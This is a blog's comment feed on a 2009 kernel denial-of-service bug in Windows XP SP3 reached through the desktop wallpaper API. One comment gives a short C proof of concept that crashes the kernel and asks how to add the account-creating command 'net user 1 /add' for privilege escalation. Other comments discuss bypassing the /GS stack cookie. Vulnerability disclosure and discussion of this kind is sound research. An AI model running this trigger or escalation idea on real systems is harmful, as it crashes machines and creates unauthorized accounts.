Comments on: Oh No, My XPSP3 http://www.ragestorm.net/blogs/?p=78 An Arkon Blog Mon, 16 Aug 2010 18:49:15 +0000 http://wordpress.org/?v=2.9.2 hourly 1 By: Insanely Low-Level » Blog Archive » Cleaning Resources Automatically http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2274 Insanely Low-Level » Blog Archive » Cleaning Resources Automatically Tue, 15 Sep 2009 03:20:15 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2274 [...] even learned that my post about the kernel DoS in XPSP3 about the desktop wallpaper weakness became a CVE. It seems MS has [...] [...] even learned that my post about the kernel DoS in XPSP3 about the desktop wallpaper weakness became a CVE. It seems MS has [...]

]]> By: hacker_bug http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2259 hacker_bug Tue, 30 Jun 2009 09:35:48 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2259 #include <windows.h> int main() { const int SPI_GETDESKWALLPAPER = 115; WCHAR c[1000] = {0}; memset(c, ā€˜cā€™, 1000); SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0); WCHAR b[1000] = {0}; SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0); return 0; } I don't know how to add this sentence exploit it to Elevation of Privilege system("net user 1 /add"); #include <windows.h>
int main()
{
const int SPI_GETDESKWALLPAPER = 115;
WCHAR c[1000] = {0};
memset(c, ā€˜cā€™, 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}

I don’t know how to add this sentence exploit it to Elevation of Privilege
system(“net user 1 /add”);

]]> By: arkon http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2222 arkon Mon, 02 Feb 2009 17:39:17 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2222 Code regression? Or maybe some changes in the profile/registry stuff. Code regression? Or maybe some changes in the profile/registry stuff.

]]> By: Peter Ferrie http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2221 Peter Ferrie Mon, 02 Feb 2009 17:16:42 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2221 Windows 2000 is not vulnerable. It fails the first call quietly, the second call succeeds, and the system keeps running normally. Windows 2000 is not vulnerable. It fails the first call quietly, the second call succeeds, and the system keeps running normally.

]]> By: mxatone http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2220 mxatone Mon, 02 Feb 2009 15:23:31 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2220 Well yeah, just that on some citrix (or alike) configurations I doubt you can change the wallpaper but I'm not an expert on that field :). I didn't look in W2K, there is a good chance that /GS cookie could be easier to defeat or not existing at all (it may depend of the service pack too). Well yeah, just that on some citrix (or alike) configurations I doubt you can change the wallpaper but I’m not an expert on that field :) .

I didn’t look in W2K, there is a good chance that /GS cookie could be easier to defeat or not existing at all (it may depend of the service pack too).

]]> By: arkon http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2219 arkon Mon, 02 Feb 2009 14:38:15 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2219 That's the reason I didn't mind giving it here. If someone manages to exploit it, way to go, I didn't even try though. I have more pressing matters on my mind :) It works on Guest User, what can you ask more? Besides maybe on WY2k, you don't have the /GS... That’s the reason I didn’t mind giving it here. If someone manages to exploit it, way to go, I didn’t even try though. I have more pressing matters on my mind :)

It works on Guest User, what can you ask more? Besides maybe on WY2k, you don’t have the /GS…

]]> By: mxatone http://www.ragestorm.net/blogs/?p=78&cpage=1#comment-2218 mxatone Mon, 02 Feb 2009 13:48:42 +0000 http://www.ragestorm.net/blogs/?p=78#comment-2218 Hi, I already looked at it some months ago and didn't find a way to exploit this vulnerability properly. As far as I remember, there is not exception handler during this overflow and the /GS flag should be guessed in order to make it properly. It is quite uneasy to do but with some memory leaking vuln, it could be done (maybe). You may already notice that you need the SETDESKWALLPAPER right to do it properly too (even if almost anyone got it). Have fun ! Hi,

I already looked at it some months ago and didn’t find a way to exploit this vulnerability properly. As far as I remember, there is not exception handler during this overflow and the /GS flag should be guessed in order to make it properly. It is quite uneasy to do but with some memory leaking vuln, it could be done (maybe). You may already notice that you need the SETDESKWALLPAPER right to do it properly too (even if almost anyone got it).

Have fun !

]]>